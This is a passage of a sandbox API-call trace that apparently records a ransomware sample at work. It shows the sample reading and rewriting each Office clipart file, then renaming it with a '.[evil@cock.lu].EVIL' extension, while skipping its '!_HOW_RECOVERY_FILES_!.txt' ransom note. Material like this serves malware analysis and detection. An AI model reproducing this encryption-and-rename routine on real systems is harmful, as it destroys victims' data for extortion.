lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1172, lpOverlapped=0x0) returned 1 [0157.871] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.872] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.872] _errno () returned 0x84b1160840 [0157.872] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.872] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1180, lpOverlapped=0x0) returned 1 [0157.872] CloseHandle (hObject=0x1a8) returned 1 [0157.872] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.872] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.872] __uncaught_exception () returned 0x84b1160800 [0157.873] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.873] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00388_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00388_.wmf.[evil@cock.lu].evil")) returned 1 [0157.874] ??_V@YAXPEAX@Z () returned 0x1 [0157.877] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF", dwFileAttributes=0x200) returned 0 [0157.877] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.878] wcsstr (_Str="NA00389_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.878] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF") returned 69 [0157.878] wcscmp (_String1="NA00389_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.878] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00389_.WMF") returned 0x0 [0157.878] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF") returned 0x45 [0157.878] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00389_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.880] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x20ca, lpOverlapped=0x0) returned 1 [0157.992] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.992] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.992] _errno () returned 0x84b1160840 [0157.992] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.992] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x20e0, lpOverlapped=0x0) returned 1 [0157.992] CloseHandle (hObject=0x1a8) returned 1 [0157.992] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.993] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.993] __uncaught_exception () returned 0x84b1160800 [0157.993] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.993] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00389_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00389_.wmf.[evil@cock.lu].evil")) returned 1 [0157.994] ??_V@YAXPEAX@Z () returned 0x1 [0157.996] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF", dwFileAttributes=0x200) returned 0 [0157.997] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.997] wcsstr (_Str="NA00390_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.997] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF") returned 69 [0157.997] wcscmp (_String1="NA00390_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.997] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00390_.WMF") returned 0x0 [0157.997] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF") returned 0x45 [0157.997] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.999] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x21c2, lpOverlapped=0x0) returned 1 [0158.006] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.006] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.006] _errno () returned 0x84b1160840 [0158.006] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.006] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x21e0, lpOverlapped=0x0) returned 1 [0158.006] CloseHandle (hObject=0x1a8) returned 1 [0158.007] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.007] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.007] __uncaught_exception () returned 0x84b1160800 [0158.007] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.007] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00390_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00390_.wmf.[evil@cock.lu].evil")) returned 1 [0158.008] ??_V@YAXPEAX@Z () returned 0x1 [0158.011] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF", dwFileAttributes=0x200) returned 0 [0158.011] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.011] wcsstr (_Str="NA00391_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.011] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF") returned 69 [0158.011] wcscmp (_String1="NA00391_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.012] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00391_.WMF") returned 0x0 [0158.012] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF") returned 0x45 [0158.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00391_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.014] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x21ec, lpOverlapped=0x0) returned 1 [0158.066] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.066] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.066] _errno () returned 0x84b1160840 [0158.066] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.066] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2200, lpOverlapped=0x0) returned 1 [0158.066] CloseHandle (hObject=0x1a8) returned 1 [0158.066] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.066] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.066] __uncaught_exception () returned 0x84b1160800 [0158.066] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.067] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00391_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00391_.wmf.[evil@cock.lu].evil")) returned 1 [0158.067] ??_V@YAXPEAX@Z () returned 0x1 [0158.070] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF", dwFileAttributes=0x200) returned 0 [0158.070] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.070] wcsstr (_Str="NA00394_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.070] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF") returned 69 [0158.070] wcscmp (_String1="NA00394_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.070] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00394_.WMF") returned 0x0 [0158.070] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF") returned 0x45 [0158.070] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00394_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.072] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2ad4, lpOverlapped=0x0) returned 1 [0158.079] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.079] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.079] _errno () returned 0x84b1160840 [0158.079] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.079] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2ae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ae0, lpOverlapped=0x0) returned 1 [0158.079] CloseHandle (hObject=0x1a8) returned 1 [0158.079] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.080] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.080] __uncaught_exception () returned 0x84b1160800 [0158.080] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.080] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00394_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00394_.wmf.[evil@cock.lu].evil")) returned 1 [0158.081] ??_V@YAXPEAX@Z () returned 0x1 [0158.083] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF", dwFileAttributes=0x200) returned 0 [0158.083] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.083] wcsstr (_Str="NA00395_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.083] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF") returned 69 [0158.083] wcscmp (_String1="NA00395_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.083] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00395_.WMF") returned 0x0 [0158.083] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF") returned 0x45 [0158.084] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00395_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.085] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x194a, lpOverlapped=0x0) returned 1 [0158.140] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.140] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.140] _errno () returned 0x84b1160840 [0158.140] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.140] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1960, lpOverlapped=0x0) returned 1 [0158.140] CloseHandle (hObject=0x1a8) returned 1 [0158.141] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.141] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.141] __uncaught_exception () returned 0x84b1160800 [0158.141] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.141] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00395_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00395_.wmf.[evil@cock.lu].evil")) returned 1 [0158.144] ??_V@YAXPEAX@Z () returned 0x1 [0158.146] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF", dwFileAttributes=0x200) returned 0 [0158.147] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.147] wcsstr (_Str="NA00396_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.147] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF") returned 69 [0158.147] wcscmp (_String1="NA00396_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.147] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00396_.WMF") returned 0x0 [0158.147] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF") returned 0x45 [0158.147] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00396_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.149] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x38c6, lpOverlapped=0x0) returned 1 [0158.159] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.159] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.159] _errno () returned 0x84b1160840 [0158.159] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.159] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x38e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x38e0, lpOverlapped=0x0) returned 1 [0158.160] CloseHandle (hObject=0x1a8) returned 1 [0158.160] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.160] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.160] __uncaught_exception () returned 0x84b1160800 [0158.160] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.160] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00396_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00396_.wmf.[evil@cock.lu].evil")) returned 1 [0158.162] ??_V@YAXPEAX@Z () returned 0x1 [0158.164] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF", dwFileAttributes=0x200) returned 0 [0158.164] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.164] wcsstr (_Str="NA00417_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.164] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF") returned 69 [0158.165] wcscmp (_String1="NA00417_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.165] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00417_.WMF") returned 0x0 [0158.165] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF") returned 0x45 [0158.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00417_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.166] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x173e, lpOverlapped=0x0) returned 1 [0158.175] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.175] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.175] _errno () returned 0x84b1160840 [0158.175] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.175] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1740, lpOverlapped=0x0) returned 1 [0158.175] CloseHandle (hObject=0x1a8) returned 1 [0158.175] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0158.176] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0158.176] __uncaught_exception () returned 0x84b1160800 [0158.176] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0158.176] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00417_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00417_.wmf.[evil@cock.lu].evil")) returned 1 [0158.177] ??_V@YAXPEAX@Z () returned 0x1 [0158.180] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF", dwFileAttributes=0x200) returned 0 [0158.181] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0158.181] wcsstr (_Str="NA00433_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0158.181] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF") returned 69 [0158.181] wcscmp (_String1="NA00433_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0158.181] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA00433_.WMF") returned 0x0 [0158.181] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF") returned 0x45 [0158.181] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00433_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0158.183] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4696, lpOverlapped=0x0) returned 1 [0158.191] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.191] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0158.191] _errno () returned 0x84b1160840 [0158.191] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.191] 